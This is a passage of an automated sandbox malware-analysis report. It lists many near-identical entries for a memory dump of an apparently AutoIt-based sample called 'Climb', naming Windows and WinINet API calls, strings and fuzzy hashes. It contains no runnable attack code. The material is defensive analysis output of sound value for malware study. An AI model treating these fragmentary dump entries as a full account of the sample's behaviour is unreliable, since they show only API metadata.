                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                                                                                          • Opcode ID: 231056b7b1d4fef2ae92d219d15b0c17eb7600b6cdc7316a5466dd889a96c4e3
                                                                                                                                                                          • Instruction ID: 028627362bddce6a42b7f61362b6dbbdfe4afe8cb066414efb0b32fb594eb07d
                                                                                                                                                                          • Opcode Fuzzy Hash: 231056b7b1d4fef2ae92d219d15b0c17eb7600b6cdc7316a5466dd889a96c4e3
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D5145714087489BD320EF54DC86BABBBF8FB94300F81894DF199421A1EF308579CB66
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BuffCharUpper_wcslen
                                                                                                                                                                          • String ID: CALLARGARRAY
                                                                                                                                                                          • API String ID: 157775604-1150593374
                                                                                                                                                                          • Opcode ID: 0e77431a81d7d664c3c56be4ba88c7d1aa681fd501bef547983b02b3085e7a70
                                                                                                                                                                          • Instruction ID: b0f894ecebcb02dca4717aeb7837548cc87fbfa95b138ec628d9a1b38e8e23a3
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e77431a81d7d664c3c56be4ba88c7d1aa681fd501bef547983b02b3085e7a70
                                                                                                                                                                          • Instruction Fuzzy Hash: 2141E171E00209DFCB00EFA9C9819FEBBB5FF683A4F104529E506A7251EB719D81CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00ADDB75
                                                                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00ADDB7F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CrackInternet_wcslen
                                                                                                                                                                          • String ID: |
                                                                                                                                                                          • API String ID: 596671847-2343686810
                                                                                                                                                                          • Opcode ID: 3f1d6097a4b0bce0efb22621b61089d7cd948e08aa36fdb33be048ce1eae2736
                                                                                                                                                                          • Instruction ID: 0f2dc9cf544bc2ffab95419692119754602448bcf520f1725b6aa512a84a8241
                                                                                                                                                                          • Opcode Fuzzy Hash: 3f1d6097a4b0bce0efb22621b61089d7cd948e08aa36fdb33be048ce1eae2736
                                                                                                                                                                          • Instruction Fuzzy Hash: 86315C71811109ABCF15EFB0CD85AEEBFB9FF04344F10002AF815A6262EB759A16CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00AF40BD
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AF40F8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$DestroyMove
                                                                                                                                                                          • String ID: static
                                                                                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                                                                                          • Opcode ID: 7ca4a4634d012ddad7333e191c9e3d9a19d8e89a101f8c4eaae8cbbd5050624b
                                                                                                                                                                          • Instruction ID: 7ccb1ea53cfb374157061ea21ab6bbaf9debdd1e57e55e6969b20213aacb722c
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ca4a4634d012ddad7333e191c9e3d9a19d8e89a101f8c4eaae8cbbd5050624b
                                                                                                                                                                          • Instruction Fuzzy Hash: AA319E71110608AADB20DFB8CC80EFB73B9FF48724F008619FAA587190DA75AC81DB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00AF50BD
                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AF50D2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID: '
                                                                                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                                                                                          • Opcode ID: acf6eef9af5e5b50765b280d0f7e5fc2e98a0148307a78fc00f4a0ba95e86fe0
                                                                                                                                                                          • Instruction ID: 08a3c7fe2104b4a167bcbc0669cb2bf21e49f962cdb64de1fced24418cd651ab
                                                                                                                                                                          • Opcode Fuzzy Hash: acf6eef9af5e5b50765b280d0f7e5fc2e98a0148307a78fc00f4a0ba95e86fe0
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F31F974E0160A9FDB14CFA9C980BEEBBB5FF49300F104169EA04AB351DB71A945CF90
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AF3D18
                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AF3D23
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID: Combobox
                                                                                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                                                                                          • Opcode ID: b9d78fcbba6885fb777007809f750cc5bbcdb3be8119b6e4e16b21ffb5aeee46
                                                                                                                                                                          • Instruction ID: 69559a872ff1f584165e4b137db14727e207c8ce09bcdc5051fdafc3a0a65d11
                                                                                                                                                                          • Opcode Fuzzy Hash: b9d78fcbba6885fb777007809f750cc5bbcdb3be8119b6e4e16b21ffb5aeee46
                                                                                                                                                                          • Instruction Fuzzy Hash: 1011B27270020CAFEF119F94DC81FBF3BAAEB843A4F104524FA1997290D671DD5287A0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A67873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A678B1
                                                                                                                                                                            • Part of subcall function 00A67873: GetStockObject.GDI32(00000011), ref: 00A678C5
                                                                                                                                                                            • Part of subcall function 00A67873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A678CF
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00AF4216
                                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 00AF4230
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                          • String ID: static
                                                                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                                                                          • Opcode ID: e656fa653ac762a20521c8cd1d5c247a4aa72997e043a40652e15eac4aa34aae
                                                                                                                                                                          • Instruction ID: 737d03543543148e95535b788103d4573ac002aecf46580b01818b1f75efb4d1
                                                                                                                                                                          • Opcode Fuzzy Hash: e656fa653ac762a20521c8cd1d5c247a4aa72997e043a40652e15eac4aa34aae
                                                                                                                                                                          • Instruction Fuzzy Hash: DE1112B2610209AFDB01DFE8CC46AFE7BB8EB08314F014929FA55E3250E634E851DB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00ADD7C2
                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00ADD7EB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                                                                          • String ID: <local>
                                                                                                                                                                          • API String ID: 942729171-4266983199
                                                                                                                                                                          • Opcode ID: 12f662f1045356fc4a611b7dcbdee6d483c190ccebcd529353ca27fcce13ed5f
                                                                                                                                                                          • Instruction ID: 69bb1df831a1cb7b03b15ceb6bee599df30e79a7ea781c297bdb29d71fa895d9
                                                                                                                                                                          • Opcode Fuzzy Hash: 12f662f1045356fc4a611b7dcbdee6d483c190ccebcd529353ca27fcce13ed5f
                                                                                                                                                                          • Instruction Fuzzy Hash: 92110C71645232BDD7344BA68C49EF7BEADEF127A4F104257F50A93280D6749840D6F0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 00AC761D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AC7629
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                          • String ID: STOP
                                                                                                                                                                          • API String ID: 1256254125-2411985666
                                                                                                                                                                          • Opcode ID: 72a777fc69ef0dd96d24d58a7b73c25d11094f4c1836e3c21ea3dbaab9b66c9f
                                                                                                                                                                          • Instruction ID: 1635a19ee4e2c8bb556b09a6c954a35b64ef1d5cd891512ee83167cef33393c9
                                                                                                                                                                          • Opcode Fuzzy Hash: 72a777fc69ef0dd96d24d58a7b73c25d11094f4c1836e3c21ea3dbaab9b66c9f
                                                                                                                                                                          • Instruction Fuzzy Hash: 10010032A149278BCB20AFBCCC40EBF73B6BF60354B020528E421D6291EB30D800CA50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                            • Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620
                                                                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AC2699
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: 2dd65b8a3d3b2f833ae5a6a62e2a3bad9e35ddf7e766c2adfe74e86eb63de864
                                                                                                                                                                          • Instruction ID: b5c1de3af9f5ecfa5bcb207efd89f71676b45cb31f03c7b146a2fc6cba6f93f1
                                                                                                                                                                          • Opcode Fuzzy Hash: 2dd65b8a3d3b2f833ae5a6a62e2a3bad9e35ddf7e766c2adfe74e86eb63de864
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A017175A11228ABCB04EBA4CD55EFE77B8EF46350B40061DA872AB3D1EB315809D770
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                            • Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620
                                                                                                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AC2593
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: aa2874efd672181e876c1bc96f21208039d7c5d32ab7b89a8b9e857cacc27cc5
                                                                                                                                                                          • Instruction ID: 27b894ce07fd1095f0dbe4b716fb2f47b8116d90b3eb233e14804d421bd62e74
                                                                                                                                                                          • Opcode Fuzzy Hash: aa2874efd672181e876c1bc96f21208039d7c5d32ab7b89a8b9e857cacc27cc5
                                                                                                                                                                          • Instruction Fuzzy Hash: E601A275A50108ABCF05EBA4CA66FFF77B8DF45340F50002DB812B7281EA259E08C7B1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                            • Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620
                                                                                                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AC2615
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: 76c00773058d2cf34132d62c02f085f314fdc2edcbd011529cb6469b95e6374c
                                                                                                                                                                          • Instruction ID: 0e285e93d3dae8d3f7b20c100b1763a60020e3a3361de62cb26f7fded2d47f66
                                                                                                                                                                          • Opcode Fuzzy Hash: 76c00773058d2cf34132d62c02f085f314fdc2edcbd011529cb6469b95e6374c
                                                                                                                                                                          • Instruction Fuzzy Hash: E101D675A40108ABDB15FBA4DA52FFF77B8DF05340F500029B802E7282DB618E08D7B1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                            • Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620
                                                                                                                                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00AC2720
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 624084870-1403004172
                                                                                                                                                                          • Opcode ID: ebc187148592f6cf80a98adf5681374d8c865b7ac569fe70f481fcb8cefc53fa
                                                                                                                                                                          • Instruction ID: 108bdcfbfa64dfc4316373429a3e6657851ca5ab5c65dadf14ea2829eccf0c03
                                                                                                                                                                          • Opcode Fuzzy Hash: ebc187148592f6cf80a98adf5681374d8c865b7ac569fe70f481fcb8cefc53fa
                                                                                                                                                                          • Instruction Fuzzy Hash: E1F0AF75A50228AADB15F7A49D96FFE77B8EF05750F400929B432E72C2EB615808C360
                                                                                                                                                                          APIs
                                                                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AC146F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message
                                                                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                          • API String ID: 2030045667-4017498283
                                                                                                                                                                          • Opcode ID: 4fd89ad260c1fa09295d894aed1435b6e1ed11d9728de64ef5c73ca1fb9f30cc
                                                                                                                                                                          • Instruction ID: bbf8565b5297f451969639794bdedbcacf966fb9ffe0d9b4a917d434ea4a36da
                                                                                                                                                                          • Opcode Fuzzy Hash: 4fd89ad260c1fa09295d894aed1435b6e1ed11d9728de64ef5c73ca1fb9f30cc
                                                                                                                                                                          • Instruction Fuzzy Hash: 3DE0D83234431836D21537E4BD07F9977858F05B61F11491AF798644C34EE224A04399
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A7FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A810E2,?,?,?,00A6100A), ref: 00A7FAD9
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00A6100A), ref: 00A810E6
                                                                                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A6100A), ref: 00A810F5
                                                                                                                                                                          Strings
                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A810F0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                          • API String ID: 55579361-631824599
                                                                                                                                                                          • Opcode ID: a069f5b28b19b7e7fb47bd7975974354204bec725a8d2955227816226d40d94d
